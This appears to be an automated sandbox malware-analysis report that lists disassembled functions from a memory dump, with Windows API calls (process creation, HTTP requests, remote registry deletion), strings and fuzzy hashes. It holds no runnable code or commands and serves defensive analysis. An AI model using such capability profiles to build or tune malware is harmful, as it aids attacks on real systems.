SetWindowTextW.USER32(?,?), ref: 002E63BE
GetDlgItem.USER32(?,000003EA), ref: 002E63D3
SetWindowTextW.USER32(00000000,?), ref: 002E63D9
GetDlgItem.USER32(?,000003E9), ref: 002E63E9
SetWindowTextW.USER32(00000000,?), ref: 002E63EF
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 002E6410
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 002E642A
GetWindowRect.USER32(?,?), ref: 002E6433
_wcslen.LIBCMT ref: 002E649A
SetWindowTextW.USER32(?,?), ref: 002E64D6
GetDesktopWindow.USER32 ref: 002E64DC
GetWindowRect.USER32(00000000), ref: 002E64E3
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 002E653A
GetClientRect.USER32(?,?), ref: 002E6547
PostMessageW.USER32(?,00000005,00000000,?), ref: 002E656C
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 002E6596

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 58bb88a7bdb744d60c860a2be030b77b1777feaabd38156c2fe0799d6efd89db
Instruction ID: 5e855b63ee8901b4e5cab59ef2e70d3820a44250a1bebdba930155d8cba833ea
Opcode Fuzzy Hash: 58bb88a7bdb744d60c860a2be030b77b1777feaabd38156c2fe0799d6efd89db
Instruction Fuzzy Hash: 5071E031A00746EFDB21DFA9CE49BAEBBF5FF18744F504918E186A25A0C774E950CB50

Function 0030086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00300884
LoadCursorW.USER32(00000000,00007F8A), ref: 0030088F
LoadCursorW.USER32(00000000,00007F00), ref: 0030089A
LoadCursorW.USER32(00000000,00007F03), ref: 003008A5
LoadCursorW.USER32(00000000,00007F8B), ref: 003008B0
LoadCursorW.USER32(00000000,00007F01), ref: 003008BB
LoadCursorW.USER32(00000000,00007F81), ref: 003008C6
LoadCursorW.USER32(00000000,00007F88), ref: 003008D1
LoadCursorW.USER32(00000000,00007F80), ref: 003008DC
LoadCursorW.USER32(00000000,00007F86), ref: 003008E7
LoadCursorW.USER32(00000000,00007F83), ref: 003008F2
LoadCursorW.USER32(00000000,00007F85), ref: 003008FD
LoadCursorW.USER32(00000000,00007F82), ref: 00300908
LoadCursorW.USER32(00000000,00007F84), ref: 00300913
LoadCursorW.USER32(00000000,00007F04), ref: 0030091E
LoadCursorW.USER32(00000000,00007F02), ref: 00300929
GetCursorInfo.USER32(?), ref: 00300939
GetLastError.KERNEL32 ref: 0030097B

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 54fe851e2c8b09e85fd335aab0ad2505bb9dd14b75e87059aa1d731149392e3c
Instruction ID: e79ddef78d5a1f5cdfac93a5e850e85918c0407a2bed6cc8b0afe2be51046fdb
Opcode Fuzzy Hash: 54fe851e2c8b09e85fd335aab0ad2505bb9dd14b75e87059aa1d731149392e3c
Instruction Fuzzy Hash: 864161B0D093196ADB109FBA8C8996EBFA8BF04354B50452AA15CE7291DB789801CF91

Function 002E3A43 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 002E3AD9
_wcslen.LIBCMT ref: 002E3B44

Strings

NAME, xrefs: 002E3C81, 002E3C92
REGEXPCLASS, xrefs: 002E3BA1, 002E3BB2
k4, xrefs: 002E3CE6
CLASSNN, xrefs: 002E3B3F, 002E3B50
INSTANCE, xrefs: 002E3D9F
CLASS, xrefs: 002E3AD4, 002E3AF1
TEXT, xrefs: 002E3DC8

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$k4
API String ID: 176396367-516724024
Opcode ID: 8c303e26c4b88dd9d0bd0e86d75d0e8e2e18c1b8904141477817f7344ead62dd
Instruction ID: 5e92c74d8457e92eee8181db12d0173cdead5da876df58fd6b387869a2204869
Opcode Fuzzy Hash: 8c303e26c4b88dd9d0bd0e86d75d0e8e2e18c1b8904141477817f7344ead62dd
Instruction Fuzzy Hash: 49E15632E60556ABCF18DF76C8496EDFBB0BF44711F94412AE456E7240DB30AEA48B90

Function 002A0436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 002A0436

Part of subcall function 002A045D: InitializeCriticalSectionAndSpinCount.KERNEL32(0035170C,00000FA0,E6727125,?,?,?,?,002C2733,000000FF), ref: 002A048C
Part of subcall function 002A045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,002C2733,000000FF), ref: 002A0497
Part of subcall function 002A045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,002C2733,000000FF), ref: 002A04A8
Part of subcall function 002A045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 002A04BE
Part of subcall function 002A045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 002A04CC
Part of subcall function 002A045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 002A04DA
Part of subcall function 002A045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 002A0505
Part of subcall function 002A045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 002A0510

___scrt_fastfail.LIBCMT ref: 002A0457

Part of subcall function 002A0413: __onexit.LIBCMT ref: 002A0419

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 002A0492
InitializeConditionVariable, xrefs: 002A04B8
kernel32.dll, xrefs: 002A04A3
SleepConditionVariableCS, xrefs: 002A04C4
WakeAllConditionVariable, xrefs: 002A04D2

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 8216e2414fc053b5124b269dab275262a55670249666da39a2a89c3ef00173c9
Instruction ID: a7af3db3420fe67f75afacbbf81f546ea7fb3b46c8ef413441e7b9ebdbe5cde4
Opcode Fuzzy Hash: 8216e2414fc053b5124b269dab275262a55670249666da39a2a89c3ef00173c9
Instruction Fuzzy Hash: 7B21F332A557257BD7122FA8AC86BE977A8FB0FB62F004129F90597290DF749C148E50

Function 002F4F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0031DCD0), ref: 002F4F6C
_wcslen.LIBCMT ref: 002F4F80
_wcslen.LIBCMT ref: 002F4FDE
_wcslen.LIBCMT ref: 002F5039
_wcslen.LIBCMT ref: 002F5084
_wcslen.LIBCMT ref: 002F50EC

Part of subcall function 0029FD52: _wcslen.LIBCMT ref: 0029FD5D

GetDriveTypeW.KERNEL32(?,00347C10,00000061), ref: 002F5188

Strings

network, xrefs: 002F50E2, 002F50E7
removable, xrefs: 002F502F, 002F5034
unknown, xrefs: 002F514D
all, xrefs: 002F4F76, 002F4F7B
ramdisk, xrefs: 002F5136
cdrom, xrefs: 002F4FD4, 002F4FD9
fixed, xrefs: 002F507A, 002F507F

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: c5fdefa6d5f03687cb71676d4853d49bee0d75783f75fe6e7b13735afdced96a
Instruction ID: b7d034fb4ac85db556437b386abf04e63b5535c2d6bb834839368b84fbc49a74
Opcode Fuzzy Hash: c5fdefa6d5f03687cb71676d4853d49bee0d75783f75fe6e7b13735afdced96a
Instruction Fuzzy Hash: 11B126311287169FC310EF28C890A7BF7E5AF957A0F50492DF69AC7291DB70D864CB92

Function 0030BA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0030BBF8
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0030BC10
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0030BC34
_wcslen.LIBCMT ref: 0030BC60
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0030BC74
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0030BC96
_wcslen.LIBCMT ref: 0030BD92

Part of subcall function 002F0F4E: GetStdHandle.KERNEL32(000000F6), ref: 002F0F6D

_wcslen.LIBCMT ref: 0030BDAB
_wcslen.LIBCMT ref: 0030BDC6
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0030BE16
GetLastError.KERNEL32(00000000), ref: 0030BE67
CloseHandle.KERNEL32(?), ref: 0030BE99
CloseHandle.KERNEL32(00000000), ref: 0030BEAA
CloseHandle.KERNEL32(00000000), ref: 0030BEBC
CloseHandle.KERNEL32(00000000), ref: 0030BECE
CloseHandle.KERNEL32(?), ref: 0030BF43

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 562ecb4116f7c4fa772dc86abcefc88a33f7be0d76172d4368b4603941e66781
Instruction ID: 7ef4248506108a9cec50a46be3cf22532e2ea199be982adc58ecf7f816b9e843
Opcode Fuzzy Hash: 562ecb4116f7c4fa772dc86abcefc88a33f7be0d76172d4368b4603941e66781
Instruction Fuzzy Hash: 75F189356153019FC716EF24C8A1B6ABBE5AF85310F15895DF8898B2E2CB70EC54CF92

Function 00304A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0031DCD0), ref: 00304B18
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00304B2A
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0031DCD0), ref: 00304B4F
FreeLibrary.KERNEL32(00000000,?,0031DCD0), ref: 00304B9B
StringFromGUID2.OLE32(?,?,00000028,?,0031DCD0), ref: 00304C05
SysFreeString.OLEAUT32(00000009), ref: 00304CBF
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00304D25
SysFreeString.OLEAUT32(?), ref: 00304D4F

Strings

kernel32.dll, xrefs: 00304B13
GetModuleHandleExW, xrefs: 00304B24

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: 025d7f6884e89d1dbfa0039e7ffadf3d965eab447c2b7221232588c2615af0eb
Instruction ID: de84a55f1be03f0d900923e068ca19e65a3e6e88e963ef8adc71dc75a7e32383
Opcode Fuzzy Hash: 025d7f6884e89d1dbfa0039e7ffadf3d965eab447c2b7221232588c2615af0eb
Instruction Fuzzy Hash: 60126FB1A01105EFDB15DF94C898EAEB7B9FF89314F158098F9059B291D731EE42CBA0

Function 0028381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(003529C0), ref: 002C3F72
GetMenuItemCount.USER32(003529C0), ref: 002C4022
GetCursorPos.USER32(?), ref: 002C4066
SetForegroundWindow.USER32(00000000), ref: 002C406F
TrackPopupMenuEx.USER32(003529C0,00000000,?,00000000,00000000,00000000), ref: 002C4082
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002C408E

Strings

0, xrefs: 0028382D

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: f180549280405ad74c9986cd7922f3f7a41c606a37561c314893d28b9a43da31
Instruction ID: f126b7b12c1cc86f4e2345e41ffdcff7a7a504aa95f15ce5f3d7afece1ee2653
Opcode Fuzzy Hash: f180549280405ad74c9986cd7922f3f7a41c606a37561c314893d28b9a43da31
Instruction Fuzzy Hash: 59710330654206BAEB25DF29DC49FEABF69FF05764F10420AF514661E1C7B1A920CB90

Function 00317711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 00317823

Part of subcall function 00288577: _wcslen.LIBCMT ref: 0028858A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00317897
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003178B9
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003178CC
DestroyWindow.USER32(?), ref: 003178ED
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00280000,00000000), ref: 0031791C
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00317935
GetDesktopWindow.USER32 ref: 0031794E
GetWindowRect.USER32(00000000), ref: 00317955
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0031796D
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00317985

Part of subcall function 00282234: GetWindowLongW.USER32(?,000000EB), ref: 00282242

Strings

tooltips_class32, xrefs: 00317890, 00317915
0, xrefs: 003177D0

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: c0df9c855370f566df4df9b88cb65d82aad1bbe253de86454bc8a2fac03893cf
Instruction ID: ee9c098ead90dab9eef4c1f9557b149308ac3801e6ffbf111a88f5208e897a0a
Opcode Fuzzy Hash: c0df9c855370f566df4df9b88cb65d82aad1bbe253de86454bc8a2fac03893cf
Instruction Fuzzy Hash: 43716970108244AFD72ADF18CC48FAABBF9EB8E304F59445DF985872A1C774A956CB11

Function 0028146D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00281802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00281488,?,00000000,?,?,?,?,0028145A,00000000,?), ref: 00281865

DestroyWindow.USER32(?), ref: 00281521
KillTimer.USER32(00000000,?,?,?,?,0028145A,00000000,?), ref: 002815BB
DestroyAcceleratorTable.USER32(00000000), ref: 002C29B4
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0028145A,00000000,?), ref: 002C29E2
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0028145A,00000000,?), ref: 002C29F9
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0028145A,00000000), ref: 002C2A15
DeleteObject.GDI32(00000000), ref: 002C2A27

Strings

<)5, xrefs: 002815E0

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID: <)5
API String ID: 641708696-3234176558
Opcode ID: 6a5bbec3ebc4fe85c278685905907fe73f9cdc6a7059ac57725040847d56df6f
Instruction ID: d0b593d321d4704faebc1e4830bbd2f79dbbe53587ebf52c55aceb3cc4b8a91f
Opcode Fuzzy Hash: 6a5bbec3ebc4fe85c278685905907fe73f9cdc6a7059ac57725040847d56df6f
Instruction Fuzzy Hash: C4617C35522702DFDB36AF14D948B2A77B9FB85322F508118E04696AF0C774A8B6CF80

Function 002FCEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002FCEF5
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 002FCF08
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 002FCF1C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 002FCF35
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 002FCF78
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 002FCF8E
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002FCF99
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 002FCFC9
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 002FD021
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 002FD035
InternetCloseHandle.WININET(00000000), ref: 002FD040

Strings

, xrefs: 002FCFBA

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 0ae5ed7c49421ff4ca732d0161153992638d827d24e7fb9af261323d96d53257
Instruction ID: 0c772ab74bdffdbf2c0a862c5ac37e9ae3fde7162ae1a79206ab8a775a812f04
Opcode Fuzzy Hash: 0ae5ed7c49421ff4ca732d0161153992638d827d24e7fb9af261323d96d53257
Instruction Fuzzy Hash: D351AFB151060DBFDB228F60CD88ABBBBBDFF09784F10852AFA4586250DB34D915DB60

Function 00318FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,003166D6,?,?), ref: 00318FEE
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,003166D6,?,?,00000000,?), ref: 00318FFE
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,003166D6,?,?,00000000,?), ref: 00319009
CloseHandle.KERNEL32(00000000,?,?,?,?,003166D6,?,?,00000000,?), ref: 00319016
GlobalLock.KERNEL32(00000000), ref: 00319024
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,003166D6,?,?,00000000,?), ref: 00319033
GlobalUnlock.KERNEL32(00000000), ref: 0031903C
CloseHandle.KERNEL32(00000000,?,?,?,?,003166D6,?,?,00000000,?), ref: 00319043
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003166D6,?,?,00000000,?), ref: 00319054
OleLoadPicture.OLEAUT32(?,00000000,00000000,00320C04,?), ref: 0031906D
GlobalFree.KERNEL32(00000000), ref: 0031907D
GetObjectW.GDI32(00000000,00000018,?), ref: 0031909D
CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 003190CD
DeleteObject.GDI32(00000000), ref: 003190F5
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0031910B

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 13fe7ab49d71ba859ed5c6511ad1913fbd715dbb7322463e538086f4e360363d
Instruction ID: fd7935ebce6e8246f3671a111fddfb15221e3cf4d1ae558d35213361cb57b3e7
Opcode Fuzzy Hash: 13fe7ab49d71ba859ed5c6511ad1913fbd715dbb7322463e538086f4e360363d
Instruction Fuzzy Hash: 67411675600218BFDB129F65DC88EEABBBDFB8E711F108469F915DB260D7709941CB20

Function 0030C06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0028B329: _wcslen.LIBCMT ref: 0028B333

Part of subcall function 0030D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0030C10E,?,?), ref: 0030D415
Part of subcall function 0030D3F8: _wcslen.LIBCMT ref: 0030D451
Part of subcall function 0030D3F8: _wcslen.LIBCMT ref: 0030D4C8
Part of subcall function 0030D3F8: _wcslen.LIBCMT ref: 0030D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0030C154
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0030C1D2
RegDeleteValueW.ADVAPI32(?,?), ref: 0030C26A
RegCloseKey.ADVAPI32(?), ref: 0030C2DE
RegCloseKey.ADVAPI32(?), ref: 0030C2FC
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0030C352
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0030C364
RegDeleteKeyW.ADVAPI32(?,?), ref: 0030C382
FreeLibrary.KERNEL32(00000000), ref: 0030C3E3
RegCloseKey.ADVAPI32(00000000), ref: 0030C3F4

Strings

advapi32.dll, xrefs: 0030C34D
RegDeleteKeyExW, xrefs: 0030C35E

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
